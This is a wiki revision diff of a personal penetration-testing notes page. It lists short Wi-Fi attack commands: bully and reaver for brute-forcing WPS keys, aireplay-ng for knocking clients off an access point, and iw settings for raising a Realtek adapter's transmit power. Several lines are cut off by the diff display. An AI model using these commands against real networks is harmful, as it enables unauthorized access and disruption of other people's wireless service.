PDO SQLite support missing in this PHP install - The sqlite plugin will not work
meta data for this page
Differences
This shows you the differences between two versions of the page.
| Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
| pentest:start [2014/10/31 05:33] – michaelurspringer | pentest:start [2014/12/23 15:08] (current) – michaelurspringer | ||
|---|---|---|---|
| Line 19: | Line 19: | ||
| # Bully for bruteforce attack of WPS key\\ | # Bully for bruteforce attack of WPS key\\ | ||
| bully -B mon0 -o < | bully -B mon0 -o < | ||
| - | | + | Alternative:\\ |
| reaver -i mon0 -vv -b < | reaver -i mon0 -vv -b < | ||
| + | |||
| + | === Higher Power for Realtek RTL8187 Wifi Adapter === | ||
| + | |||
| + | # Does not work!? \\ | ||
| + | modprobe rtl8187\\ | ||
| + | iw reg set B0\\ | ||
| + | iw dev wlan0 set txpower auto\\ | ||
| + | # check: \\ | ||
| + | iwlist wlan 0 txpower | grep " | ||
| + | |||
| + | |||
| + | === Deauth client from AP === | ||
| + | |||
| + | aireplay-ng -0 10 -a <BSSID AP> -c <BSSID CLient; optional> | ||
| + | |||
| + | === Links === | ||
| + | |||
| + | https:// | ||
| + | |||